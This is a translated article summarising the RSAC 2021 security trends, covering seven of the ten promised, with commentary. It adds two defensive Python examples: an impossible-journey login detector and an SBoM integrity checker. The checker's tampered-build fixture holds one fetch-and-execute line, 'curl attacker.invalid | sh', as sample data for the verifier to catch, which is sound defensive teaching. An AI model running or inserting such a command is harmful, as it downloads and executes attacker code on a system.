

Essentials: A Quick Look at the RSAC 2021 Top Ten Security Trends

2021-05-24 09:29 | Source: unknown | Author: dnzg
  The COVID-19 pandemic, like a black swan, has changed how people work and live. It not only made RSA Conference meet its audience in a fully virtual format for the first time, it also bound people far more tightly to the network, making the importance of cybersecurity ever more visible.
 
  RSA Conference, the pioneering industry event that the whole field watches, has long been a bellwether for where technical research is heading. This year the organizers distilled future trends from some 2,000 early submissions and, after repeated screening and assessment, released the new year's top ten security trends at RSAC 2021.
 
  Below, Xiao An walks through the RSAC 2021 top ten security trends one by one, drawing on the original text.
 
  Trend 1: Evolution of security management roles
 
  Evolution of Roles: As we've seen every year, there were many submissions that spoke to the evolution of the CISO, who is increasingly required to have more frequent communication with the board; thus, attendees at RSA Conference 2021 will have the opportunity to learn about the ways that CISOs can develop new communications skills. We are seeing a trend in the rise of Chief Product Security Officers (CPSOs), a role PC member Megan Samford on the Securing All the Things track pointed out is separate from a CISO. The CPSO "covers the security of what a company sells—building security in, both in terms of features and secure development throughout the lifecycle of a product."
 
  📌 Xiao An's comment: As information security gains standing within the enterprise, the responsibilities of security management roles are changing with it. The CISO (Chief Information Security Officer) alone can no longer cover every security management need, which has led to the emergence of the CPSO (Chief Product Security Officer) role and the shift toward the CIRO (Chief Information Risk Officer). The responsibilities of these two roles differ somewhat from the CISO's, yet both are indispensable to the enterprise, so the skills and qualities they require are something enterprises and the security community need to work out together.
 
  Trend 2: Artificial intelligence and machine learning
 
  Straight Talk about ML & AI: This year's PC for the ML & AI track was pleased to see talks that focused on the practical realities of using AI and ML. "These are vast, confusing technical areas, and in previous years we saw a lot of 'magic unicorn glitter'—which made this year's submission a welcome change," wrote Diana Kelley and Saurabh Shintre. "The trend this year was towards lessons learned, applicable takeaways for organizations and practitioners as well as limitations and issues around potential harms of AI." Kelley and Shintre really appreciate seeing more practical use cases in submissions offering ways to generate and catch spam using AI tools like Generative Pre-trained Transformer 3 (GPT-3), how ML can inject fairness into federated learning, how to stop attacks on advanced driving-assistance systems, and how ML is in use today at large financial services institutions to advance data visualization and automation to combat fraud.
 
  📌 Xiao An's comment: AI and ML have long been the hottest topic in the security industry, especially among academics and security research teams. The most pressing problem of recent years is how to turn those results into something deployable: products, or defensive solutions an enterprise can run. We now see commercial security products at home and abroad that lead with AI and ML, and we also see adversarial-attack results from teams that specialize in AI; its future in security remains wide open.
 
  Trend 3: Information manipulation and its impact
 
  Information Manipulation and Its Impact: A resounding theme this year is echoed in the title of one of this year's Human Element sessions: Invisible Security: Protecting Users with No Time to Spare. Trending more than phishing, though, was disinformation campaigns. Andrea Little Limbago, PC member on the Human Element track, wrote, "There were also several submissions on disinformation campaigns and their security impact. On the one hand, this is not surprising given the widespread impact of these campaigns from many of the same threat actors."
 
  📌 Xiao An's comment: Information manipulation is another important trend RSAC raised this year. With COVID-19 still raging in Europe and the US, false information keeps surfacing on every social media platform, and the recent Chengdu No. 49 Middle School incident in China and the information war inside the Israeli-Palestinian conflict both highlight how influential and important information manipulation has become.
 
  Trend 4: Ransomware
 
  Ransomware Attacks: Greg Day was not surprised to see a continued focus on ransomware in the Hackers & Threats track. "We have seen the attacks becoming more sophisticated and targeted. Often they are now carrying multiple payloads such as ransoming data access but also either reselling the data on or extorting further funds under threat of posting non-public data in the public domain," Day wrote. "And while some ransomware is still focused on random victims, others have become far more targeted. The healthcare industry has certainly seen the pain from this."
 
  📌 Xiao An's comment: An old topic, but one that cannot be skipped. Arrests and takedowns by various countries had slowed the growth of ransomware, but DarkSide's heavy blow against a fuel company reminded everyone how unbalanced attack and defense still are. Compared with last year, ransomware has taken its "quality of service" a step further, and has even started a new fashion of extorting with the threat of publishing data alone, without encrypting anything. Infrastructure, pharmaceutical and healthcare companies and institutions will need to put more effort into countering this threat.
 
  Trend 5: Sharing, and how to share
 
  Share and Share Alike: Submissions reviewed by the Analytics, Intelligence & Response PC revealed that more intelligence sharing is needed. Todd Inskeep wrote, "Several organizations have learned lessons that work in specific sectors (like the Cyber Threat Alliance for the cybersecurity industry) and plan to share lessons on how to make sharing work better and make it more valuable. Perhaps the most intriguing thesis is that aligning intelligence sharing to business needs can drive more valuable sharing of insights."
 
  📌 Xiao An's comment: The further intelligence work develops, the more the security community recognizes the importance of sharing it. To get 1+1>2, simply handing intelligence around is not enough; deeper cooperation and more mature cooperation mechanisms are needed. The trend raised here is intelligence sharing: first a call for the security community to cooperate more, then a discussion of how to cooperate better.
 
  Trend 6: Changes in people, process and technology in enterprise security
 
  Resilience of People, Processes and Technologies: Resilience, which is core to our industry and is key to define clearly, was highlighted more and more in submissions as discussions shift to calibration of risk; indeed, our Risk Management & Governance track is full of actionable approaches. The challenge of the rapid flip to a predominantly dispersed workforce was significant enough that we decided to highlight it in the new Securing the Remote Workforce track, designed to provide prescriptive guidance to threats from a home-based workforce and recommendations for organizations needing to adjust to the normalization of changes that have been implemented. The track will also look into the future and deliver concrete ideas to help organizations thrive in a sea of change. Assessments have shined the light on challenges and opportunities for organizations that have quickly pivoted, and continuous controls monitoring is being used to help companies raise the bar and evolve cybersecurity resilience. Threat hunting was a significant "microtrend" within this macrotrend of resilience, with submissions focused on proactive approaches and picking up on untraditional and difficult-to-find threat indicators like lateral movement, exfiltration, compromised accounts, C2 activity detection, impossible journeys, internal recon, abnormal processes and many more nuanced activities as they worked to scan themselves in search of problems. The significant uptick on "art of the hunt" submissions was of great interest, as was the employment of artificial intelligence to enhance the work of human hunters.
 
  📌 Xiao An's comment: The future is hard to read: before an enterprise has adapted to a newly established security policy, the environment and the requirements have already moved on. Setting aside the work-from-home wave the pandemic brought, enterprises themselves are constantly adjusting, so how to make the enterprise fit its security policy, and how to make the security policy fit an enterprise that keeps evolving, becomes the central question.
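  One of the hunting indicators named in the trend above, the "impossible journey" (the same account signing in from two places farther apart than anyone could travel in the time between the two logins), worked through as an added example; it is not part of the original article or of the RSAC material. The log format, the IP-to-location table and the 900 km/h threshold are assumptions constructed for the example; in a real hunt the events would come from the identity provider's sign-in log and the locations from a GeoIP database.

```python
"""Impossible-journey hunt: flag an account that authenticates from two places
farther apart than it could have travelled in the time between the two logins.
Added example; the log lines, geo table and threshold are constructed."""
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed stand-in for a GeoIP database: source IP -> (latitude, longitude).
GEO = {
    "203.0.113.10": (51.5074, -0.1278),   # London
    "198.51.100.7": (40.7128, -74.0060),  # New York
    "192.0.2.44": (51.5100, -0.1300),     # London, a second egress address
}

# Constructed sign-in log, one event per line: "<UTC timestamp> <user> <result> <source ip>".
SAMPLE_LOG = """\
2021-05-20T08:00:00Z alice success 203.0.113.10
2021-05-20T08:45:00Z alice success 198.51.100.7
2021-05-20T09:10:00Z bob success 203.0.113.10
2021-05-20T17:30:00Z bob success 198.51.100.7
2021-05-20T10:00:00Z carol failure 198.51.100.7
2021-05-20T10:05:00Z carol success 192.0.2.44
"""

MAX_PLAUSIBLE_KMH = 900.0  # assumed ceiling: roughly airliner cruising speed


@dataclass(frozen=True)
class Login:
    ts: datetime
    user: str
    src_ip: str


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) pairs given in degrees."""
    lat1, lon1 = map(radians, a)
    lat2, lon2 = map(radians, b)
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def parse_log(text):
    """Keep successful sign-ins only: a failed attempt does not prove presence."""
    logins = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, result, ip = line.split()
        if result != "success":
            continue
        logins.append(Login(datetime.fromisoformat(ts.replace("Z", "+00:00")), user, ip))
    return logins


def find_impossible_journeys(logins, geo=GEO, max_kmh=MAX_PLAUSIBLE_KMH):
    """Return one finding per consecutive login pair whose implied speed exceeds max_kmh."""
    by_user = {}
    for login in sorted(logins, key=lambda entry: entry.ts):
        by_user.setdefault(login.user, []).append(login)
    findings = []
    for user, seq in by_user.items():
        for prev, cur in zip(seq, seq[1:]):
            if prev.src_ip == cur.src_ip:
                continue
            if prev.src_ip not in geo or cur.src_ip not in geo:
                continue  # no location for one side: cannot judge, so do not alert
            km = haversine_km(geo[prev.src_ip], geo[cur.src_ip])
            hours = (cur.ts - prev.ts).total_seconds() / 3600.0
            # Two places in the same instant is "infinitely fast"; avoid dividing by zero.
            speed = float("inf") if hours == 0 else km / hours
            if speed > max_kmh:
                findings.append({"user": user, "from": prev.src_ip, "to": cur.src_ip,
                                 "km": round(km), "hours": round(hours, 2), "kmh": speed})
    return findings


if __name__ == "__main__":
    for f in find_impossible_journeys(parse_log(SAMPLE_LOG)):
        print(f"{f['user']}: {f['from']} -> {f['to']}, {f['km']} km in {f['hours']} h")
```

  On the constructed input only alice is flagged (London to New York in 45 minutes); bob makes the same trip in over eight hours, and carol's failed attempt from New York is ignored because only a successful sign-in establishes where an account was. Unknown source IPs are skipped rather than alerted on, which keeps the rule low-noise but means VPN exits and CGNAT ranges should be mapped before relying on it.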
 
  Trend 7: Supply chain security
 
  Supply Chain Security & Software Integrity: Another trend within the macrotrend of resilience that bears its own review is supply chain security and, related, software integrity, particularly in light of the SolarWinds breach and the ever-growing list of related breaches, a theme that will be touched on in many keynote and track sessions. The 2021 submissions explored the implications of our supply chains on third-party risk, physical security, operational security and business continuity, and also examined the very real and growing geopolitical tensions on supply chain resilience. Always seeking actionable guidance in the material put forward for RSA Conference attendees, the Program Committee was pleased to see sessions focused on the Digital Bill of Materials (DBoM) and Software Bill of Materials (SBoM) as tools to help address supply chain risk management challenges and public-private collaboration opportunities. Reliability, code integrity and good development practices as a theme within DevSecOps & Software Security submissions was also at an all-time high in the proposals reviewed, pointing to steps in our community toward more secure application development processes.
 
  📌 Xiao An's comment: The enormous payoff of supply chain attacks has forced attackers, enterprises and even governments to take supply chain security seriously. The supply chain attacks that have already happened have had real effects on enterprise security, personal safety and even national security, so defending against them is imperative. DevSecOps, as the approach to securing the whole product lifecycle, will also be an unavoidable topic in supply chain security.
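  How an SBoM supports the software-integrity check the trend above points to, as an added example that comes from neither the article nor any SBoM tool: a build-time step records one SHA-256 per component in a simplified CycloneDX-style JSON document, and a deploy-time step compares what is actually installed against it, reporting modified, missing and unlisted components. The component names, their contents and the tampering are all constructed for the example.

```python
"""Build-time SBoM generation and deploy-time integrity verification.
Added example with constructed components; the document shape follows CycloneDX
(bomFormat/specVersion/components/hashes) in simplified form."""
import hashlib
import json

# Constructed stand-in for a build's artifacts: (component name, version) -> bytes.
GOOD_BUILD = {
    ("libfoo", "1.2.3"): b"int foo(void) { return 42; }\n",
    ("netutil", "0.9.0"): b"def fetch(u): return open_url(u)\n",
}

# The same release as found on a host: one component silently modified, one extra
# binary that never appeared in the build.
TAMPERED_BUILD = {
    ("libfoo", "1.2.3"): b"int foo(void) { return 42; }\n",
    ("netutil", "0.9.0"): b"def fetch(u): beacon(); return open_url(u)\n",
    ("helper", "0.0.1"): b"#!/bin/sh\ncurl attacker.invalid | sh\n",
}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def generate_sbom(artifacts):
    """Emit a minimal CycloneDX-style SBoM recording a SHA-256 for every component."""
    components = [
        {
            "type": "library",
            "name": name,
            "version": version,
            "hashes": [{"alg": "SHA-256", "content": sha256_hex(blob)}],
        }
        for (name, version), blob in sorted(artifacts.items())
    ]
    return json.dumps(
        {"bomFormat": "CycloneDX", "specVersion": "1.4", "components": components},
        indent=2,
    )


def verify_against_sbom(sbom_json, artifacts):
    """Compare deployed artifacts with the SBoM; return sorted findings (empty means clean).

    Findings are (kind, (name, version)) with kind one of
    "hash-mismatch", "missing", "unlisted" or "no-sha256"."""
    bom = json.loads(sbom_json)
    expected = {}
    findings = []
    for comp in bom["components"]:
        key = (comp["name"], comp["version"])
        digest = next((h["content"] for h in comp.get("hashes", []) if h["alg"] == "SHA-256"), None)
        if digest is None:
            findings.append(("no-sha256", key))  # listed but unverifiable
            continue
        expected[key] = digest
    for key, digest in expected.items():
        if key not in artifacts:
            findings.append(("missing", key))
        elif sha256_hex(artifacts[key]) != digest:
            findings.append(("hash-mismatch", key))
    # Anything present on the host that the build never declared.
    for key in artifacts.keys() - expected.keys():
        findings.append(("unlisted", key))
    return sorted(findings)


if __name__ == "__main__":
    sbom = generate_sbom(GOOD_BUILD)
    print(sbom)
    for kind, (name, version) in verify_against_sbom(sbom, TAMPERED_BUILD):
        print(f"{kind}: {name} {version}")
```

  The check is only as trustworthy as the SBoM it reads: an attacker who can modify the artifact can usually regenerate the document too, so the SBoM must be signed by the build system and delivered separately from the software it describes, and the verifier should look for declared components without a usable hash rather than silently passing them.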
(Editor in charge: dnzg)